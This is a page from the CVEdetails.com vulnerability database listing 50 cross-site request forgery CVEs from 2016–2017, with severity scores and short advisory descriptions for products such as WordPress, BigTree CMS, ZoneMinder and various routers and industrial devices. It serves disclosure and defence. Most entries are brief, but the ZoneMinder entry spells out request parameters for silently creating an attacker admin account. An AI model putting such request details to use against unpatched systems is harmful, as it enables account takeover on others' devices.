CVEdetails.com the ultimate security vulnerability data source
(e.g.: CVE-2009-1234 or 2010-1234 or 20101234)
Log In   Register
Vulnerability Feeds & WidgetsNew   www.itsecdb.com  

Security Vulnerabilities (CSRF)

Press ESC to close
# CVE ID CWE ID # of Exploits Vulnerability Type(s) Publish Date Update Date Score Gained Access Level Access Complexity Authentication Conf. Integ. Avail.
1 CVE-2017-7178 352 CSRF 2017-03-18 2017-03-24
6.8
None Remote Medium Not required Partial Partial Partial
CSRF was discovered in the web UI in Deluge before 1.3.14. The exploitation methodology involves (1) hosting a crafted plugin that executes an arbitrary program from its __init__.py file and (2) causing the victim to download, install, and enable this plugin.
2 CVE-2017-6918 352 CSRF 2017-03-15 2017-03-16
4.3
None Remote Medium Not required None Partial None
CSRF exists in BigTree CMS 4.2.16 with the value[#][*] parameter to the admin/settings/update/ page. The Navigation Social can be changed.
3 CVE-2017-6917 352 CSRF 2017-03-15 2017-03-16
4.3
None Remote Medium Not required None Partial None
CSRF exists in BigTree CMS 4.2.16 with the value parameter to the admin/settings/update/ page. The Colophon can be changed.
4 CVE-2017-6916 352 CSRF 2017-03-15 2017-03-16
4.3
None Remote Medium Not required None Partial None
CSRF exists in BigTree CMS 4.1.18 with the nav-social[#] parameter to the admin/settings/update/ page. The Navigation Social can be changed.
5 CVE-2017-6915 352 CSRF 2017-03-15 2017-03-16
4.3
None Remote Medium Not required None Partial None
CSRF exists in BigTree CMS 4.1.18 with the colophon parameter to the admin/settings/update/ page. The Colophon can be changed.
6 CVE-2017-6914 352 CSRF 2017-03-15 2017-03-16
5.8
None Remote Medium Not required None Partial Partial
CSRF exists in BigTree CMS 4.1.18 and 4.2.16 with the id parameter to the admin/ajax/users/delete/ page. A user can be deleted.
7 CVE-2017-6819 352 CSRF 2017-03-11 2017-03-14
4.3
None Remote Medium Not required None None Partial
In WordPress before 4.7.3, there is cross-site request forgery (CSRF) in Press This (wp-admin/includes/class-wp-press-this.php), leading to excessive use of server resources. The CSRF can trigger an outbound HTTP request for a large file that is then parsed by Press This.
8 CVE-2017-6803 352 Exec Code CSRF 2017-03-20 2017-03-23
6.8
None Remote Medium Not required Partial Partial Partial
Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface in the Scheduler in SolarWinds (formerly Serv-U) FTP Voyager 16.2.0 allow remote attackers to hijack the authentication of users for requests that (1) change the admin password, (2) terminate the scheduler, or (3) possibly execute arbitrary commands via crafted requests to Admin/XML/Result.xml.
9 CVE-2017-6411 352 CSRF 2017-03-06 2017-03-07
6.8
None Remote Medium Not required Partial Partial Partial
Cross Site Request Forgery (CSRF) on D-Link DSL-2730U C1 IN_1.00 devices allows remote attackers to change the DNS or firewall configuration or any password.
10 CVE-2017-6379 352 CSRF 2017-03-16 2017-03-17
5.1
None Remote High Not required Partial Partial Partial
Some administrative paths in Drupal 8.2.x before 8.2.7 did not include protection for CSRF. This would allow an attacker to disable some blocks on a site. This issue is mitigated by the fact that users would have to know the block ID.
11 CVE-2017-6366 Exec Code CSRF 2017-03-15 2017-03-15
0.0
None ??? ??? ??? ??? ??? ???
Cross-site request forgery (CSRF) vulnerability in NETGEAR DGN2200 routers with firmware 10.0.0.20 through 10.0.0.50 allows remote attackers to hijack the authentication of users for requests that perform DNS lookups via the host_name parameter to dnslookup.cgi. NOTE: this issue can be combined with CVE-2017-6334 to execute arbitrary code remotely.
12 CVE-2017-6180 352 CSRF 2017-03-13 2017-03-14
6.8
None Remote Medium Not required Partial Partial Partial
Keekoon KK002 devices 1.8.12 HD have a Cross Site Request Forgery Vulnerability affecting goform/formChnUserPwd and goform/formUserMng (and the entire set of other pages).
13 CVE-2017-6127 352 CSRF 2017-02-21 2017-03-01
6.8
None Remote Medium Not required Partial Partial Partial
Multiple cross-site request forgery (CSRF) vulnerabilities in the access portal on the DIGISOL DG-HR1400 Wireless Router with firmware 1.00.02 allow remote attackers to hijack the authentication of administrators for requests that (1) change the SSID, (2) change the Wi-Fi password, or (3) possibly have unspecified other impact via crafted requests to form2WlanBasicSetup.cgi.
14 CVE-2017-6081 352 CSRF 2017-03-13 2017-03-17
6.8
None Remote Medium Not required Partial Partial Partial
A CSRF issue was discovered in Zammad before 1.0.4, 1.1.x before 1.1.3, and 1.2.x before 1.2.1. To exploit the vulnerability, an attacker can send cross-domain requests directly to the REST API for users with a valid session cookie.
15 CVE-2017-6069 352 XSS CSRF 2017-03-26 2017-03-28
6.8
None Remote Medium Not required Partial Partial Partial
Subrion CMS 4.0.5 has CSRF in admin/blog/add/. The attacker can add any tag, and can optionally insert XSS via the tags parameter.
16 CVE-2017-6068 352 XSS CSRF 2017-03-26 2017-03-28
6.8
None Remote Medium Not required Partial Partial Partial
Subrion CMS 4.0.5 has CSRF in admin/blocks/add/. The attacker can create any block, and can optionally insert XSS via the content parameter.
17 CVE-2017-6066 352 XSS CSRF 2017-03-26 2017-03-28
6.8
None Remote Medium Not required Partial Partial Partial
Subrion CMS 4.0.5 has CSRF in admin/languages/edit/1/. The attacker can perform any Edit Language action, and can optionally insert XSS via the title parameter.
18 CVE-2017-6002 352 XSS CSRF 2017-03-26 2017-03-28
6.8
None Remote Medium Not required Partial Partial Partial
Subrion CMS 4.0.5.10 has CSRF in admin/blog/add/. The attacker can add any blog entry, and can optionally insert XSS into that entry via the body parameter.
19 CVE-2017-5959 264 Bypass CSRF 2017-02-21 2017-02-23
7.5
None Remote Low Not required Partial Partial Partial
CSRF token bypass in GeniXCMS before 1.0.2 could result in escalation of privileges. The forgotpassword.php page can be used to acquire a token.
20 CVE-2017-5874 352 XSS Bypass CSRF 2017-03-22 2017-03-23
6.8
None Remote Medium Not required Partial Partial Partial
CSRF exists on D-Link DIR-600M Rev. Cx devices before v3.05ENB01_beta_20170306. This can be used to bypass authentication and insert XSS sequences or possibly have unspecified other impact.
21 CVE-2017-5633 352 CSRF 2017-03-06 2017-03-09
8.5
None Remote Medium Single system Complete Complete Complete
Multiple cross-site request forgery (CSRF) vulnerabilities on the D-Link DI-524 Wireless Router with firmware 9.01 allow remote attackers to (1) change the admin password, (2) reboot the device, or (3) possibly have unspecified other impact via crafted requests to CGI programs.
22 CVE-2017-5492 352 CSRF 2017-01-14 2017-01-18
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in the widget-editing accessibility-mode feature in WordPress before 4.7.1 allows remote attackers to hijack the authentication of unspecified victims for requests that perform a widgets-access action, related to wp-admin/includes/class-wp-screen.php and wp-admin/widgets.php.
23 CVE-2017-5489 352 CSRF 2017-01-14 2017-01-18
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in WordPress before 4.7.1 allows remote attackers to hijack the authentication of unspecified victims via vectors involving a Flash file upload.
24 CVE-2017-5476 352 CSRF 2017-01-14 2017-01-25
6.8
None Remote Medium Not required Partial Partial Partial
Serendipity through 2.0.5 allows CSRF for the installation of an event plugin or a sidebar plugin.
25 CVE-2017-5475 352 CSRF 2017-01-14 2017-01-25
6.8
None Remote Medium Not required Partial Partial Partial
comment.php in Serendipity through 2.0.5 allows CSRF in deleting any comments.
26 CVE-2017-5473 352 CSRF 2017-01-14 2017-01-26
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in ntopng through 2.4 allows remote attackers to hijack the authentication of arbitrary users, as demonstrated by admin/add_user.lua, admin/change_user_prefs.lua, admin/delete_user.lua, and admin/password_reset.lua.
27 CVE-2017-5368 352 CSRF 2017-02-06 2017-02-09
6.8
None Remote Medium Not required Partial Partial Partial
ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, is vulnerable to CSRF (Cross Site Request Forgery) which allows a remote attack to make changes to the web application as the current logged in victim. If the victim visits a malicious web page, the attacker can silently and automatically create a new admin user within the web application for remote persistence and further attacks. The URL is /zm/index.php and sample parameters could include action=user uid=0 newUser[Username]=attacker1 newUser[Password]=Password1234 conf_password=Password1234 newUser[System]=Edit (among others).
28 CVE-2017-5169 352 Exec Code CSRF 2017-02-13 2017-02-28
5.1
None Remote High Not required Partial Partial Partial
An issue was discovered in Hanwha Techwin Smart Security Manager Versions 1.5 and prior. Multiple Cross Site Request Forgery vulnerabilities have been identified. The flaws exist within the Redis and Apache Felix Gogo servers that are installed as part of this product. By issuing specific HTTP Post requests, an attacker can gain system level access to a remote shell session. Smart Security Manager Versions 1.5 and prior are affected by these vulnerabilities. These vulnerabilities can allow for remote code execution.
29 CVE-2017-5165 352 CSRF 2017-02-13 2017-02-16
6.8
None Remote Medium Not required Partial Partial Partial
An issue was discovered in BINOM3 Universal Multifunctional Electric Power Quality Meter. There is no CSRF Token generated per page and/or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration.
30 CVE-2017-5145 352 CSRF 2017-02-13 2017-02-24
7.5
None Remote Low Not required Partial Partial Partial
An issue was discovered in Carlo Gavazzi VMU-C EM prior to firmware Version A11_U05, and VMU-C PV prior to firmware Version A17. Successful exploitation of this CROSS-SITE REQUEST FORGERY (CSRF) vulnerability can allow execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration.
31 CVE-2017-3877 352 CSRF 2017-03-17 2017-03-21
4.3
None Remote Medium Not required None Partial None
A vulnerability in the web framework of Cisco Unified Communications Manager (CallManager) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack against a user of the web interface of the affected software. More Information: CSCvb70021. Known Affected Releases: 11.5(1.11007.2).
32 CVE-2017-3794 352 CSRF 2017-01-26 2017-01-27
6.8
None Remote Medium Not required Partial Partial Partial
A vulnerability in Cisco WebEx Meetings Server could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack against an administrative user. More Information: CSCuz03317. Known Affected Releases: 2.6. Known Fixed Releases: 2.7.1.12.
33 CVE-2017-2682 352 CSRF 2017-02-27 2017-03-15
6.8
None Remote Medium Not required Partial Partial Partial
The Siemens web application RUGGEDCOM NMS < V1.2 on port 8080/TCP and 8081/TCP could allow a remote attacker to perform a Cross-Site Request Forgery (CSRF) attack, potentially allowing an attacker to execute administrative operations, provided the targeted user has an active session and is induced to trigger a malicious request.
34 CVE-2017-0045 352 +Info CSRF 2017-03-16 2017-03-24
4.3
None Remote Medium Not required Partial None None
Windows DVD Maker in Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, and Windows Vista SP2 does not properly parse crafted .msdvd files, which allows attackers to obtain information to compromise a target system, aka "Windows DVD Maker Cross-Site Request Forgery Vulnerability."
35 CVE-2016-1000213 352 CSRF 2016-10-25 2016-11-07
6.8
None Remote Medium Not required Partial Partial Partial
Ruckus Wireless H500 web management interface CSRF
36 CVE-2016-10206 352 CSRF 2017-03-03 2017-03-07
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in Zoneminder 1.30 and earlier allows remote attackers to hijack the authentication of users for requests that change passwords and possibly have unspecified other impact as demonstrated by a crafted user action request to index.php.
37 CVE-2016-9975 352 CSRF 2017-02-24 2017-03-01
6.8
None Remote Medium Not required Partial Partial Partial
IBM Jazz for Service Management 1.1.2.1 and 1.1.3 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM Reference #: 1998714.
38 CVE-2016-9866 352 CSRF 2016-12-10 2016-12-23
6.8
None Remote Medium Not required Partial Partial Partial
An issue was discovered in phpMyAdmin. When the arg_separator is different from its default & value, the CSRF token was not properly stripped from the return URL of the preference import action. All 4.6.x versions (prior to 4.6.5), 4.4.x versions (prior to 4.4.15.9), and 4.0.x versions (prior to 4.0.10.18) are affected.
39 CVE-2016-9730 352 CSRF 2017-03-07 2017-03-09
4.3
None Remote Medium Not required None Partial None
IBM QRadar Incident Forensics 7.2 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM Reference #: 1999549.
40 CVE-2016-9456 CSRF 2017-03-27 2017-03-27
0.0
None ??? ??? ??? ??? ??? ???
Revive Adserver before 3.2.3 suffers from Cross-Site Request Forgery (CSRF). The Revive Adserver team conducted a security audit of the admin interface scripts in order to identify and fix other potential CSRF vulnerabilities. Over 20+ such issues were fixed.
41 CVE-2016-9455 CSRF 2017-03-27 2017-03-27
0.0
None ??? ??? ??? ??? ??? ???
Revive Adserver before 3.2.3 suffers from Cross-Site Request Forgery (CSRF). A number of scripts in Revive Adserver's user interface are vulnerable to CSRF attacks: `www/admin/banner-acl.php`, `www/admin/banner-activate.php`, `www/admin/banner-advanced.php`, `www/admin/banner-modify.php`, `www/admin/banner-swf.php`, `www/admin/banner-zone.php`, `www/admin/tracker-modify.php`.
42 CVE-2016-9365 352 CSRF 2017-02-13 2017-02-17
6.8
None Remote Medium Not required Partial Partial Partial
An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6x50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. Requests are not verified to be intentionally submitted by the proper user (CROSS-SITE REQUEST FORGERY).
43 CVE-2016-9218 352 CSRF 2017-01-26 2017-01-27
6.8
None Remote Medium Not required Partial Partial Partial
A vulnerability in Cisco Hybrid Meeting Server could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack against the user of the web interface. More Information: CSCvc28662. Known Affected Releases: 1.0.
44 CVE-2016-9127 CSRF 2017-03-27 2017-03-27
0.0
None ??? ??? ??? ??? ??? ???
Revive Adserver before 3.2.3 suffers from Cross-Site Request Forgery (CSRF). The password recovery form in Revive Adserver is vulnerable to CSRF attacks. This vulnerability could be exploited to send a large number of password recovery emails to the registered users, especially in conjunction with a bug that caused recovery emails to be sent to all the users at once. Both issues have been fixed.
45 CVE-2016-8941 352 CSRF 2017-02-01 2017-02-13
6.8
None Remote Medium Not required Partial Partial Partial
IBM Tivoli Storage Productivity Center is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.
46 CVE-2016-8673 352 CSRF 2016-11-23 2017-03-16
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in the integrated web server on Siemens SIMATIC CP 343-1 Advanced prior to version 3.0.53, SIMATIC CP 443-1 Advanced prior to version 3.2.17, SIMATIC S7-300 CPU, and SIMATIC S7-400 CPU devices allows remote attackers to hijack the authentication of arbitrary users.
47 CVE-2016-8504 352 CSRF 2016-10-26 2016-12-02
4.3
None Remote Medium Not required Partial None None
CSRF of synchronization form in Yandex Browser for desktop before version 16.6 could be used by remote attacker to steal saved data in browser profile.
48 CVE-2016-8369 352 CSRF 2017-02-13 2017-02-17
6.8
None Remote Medium Not required Partial Partial Partial
An issue was discovered in Lynxspring JENEsys BAS Bridge versions 1.1.8 and older. The application does not sufficiently verify if a request was intentionally provided by the user who submitted the request (CROSS-SITE REQUEST FORGERY).
49 CVE-2016-8350 352 CSRF 2017-02-13 2017-03-02
6.8
None Remote Medium Not required Partial Partial Partial
An issue was discovered in Moxa ioLogik E1210, firmware Version V2.4 and prior, ioLogik E1211, firmware Version V2.3 and prior, ioLogik E1212, firmware Version V2.4 and prior, ioLogik E1213, firmware Version V2.5 and prior, ioLogik E1214, firmware Version V2.4 and prior, ioLogik E1240, firmware Version V2.3 and prior, ioLogik E1241, firmware Version V2.4 and prior, ioLogik E1242, firmware Version V2.4 and prior, ioLogik E1260, firmware Version V2.4 and prior, ioLogik E1262, firmware Version V2.4 and prior, ioLogik E2210, firmware versions prior to V3.13, ioLogik E2212, firmware versions prior to V3.14, ioLogik E2214, firmware versions prior to V3.12, ioLogik E2240, firmware versions prior to V3.12, ioLogik E2242, firmware versions prior to V3.12, ioLogik E2260, firmware versions prior to V3.13, and ioLogik E2262, firmware versions prior to V3.12. The web application may not sufficiently verify whether a request was provided by a valid user (CROSS-SITE REQUEST FORGERY).
50 CVE-2016-8201 352 CSRF 2017-01-14 2017-02-02
6.0
None Remote Medium Single system Partial Partial Partial
A CSRF vulnerability in Brocade Virtual Traffic Manager versions released prior to and including 11.0 could allow an attacker to trick a logged-in user into making administrative changes on the traffic manager cluster.
Total number of vulnerabilities : 1401   Page : 1 (This Page)2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29
CVE is a registred trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registred trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site. OVAL is a registered trademark of The MITRE Corporation and the authoritative source of OVAL content is MITRE's OVAL web site.
Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.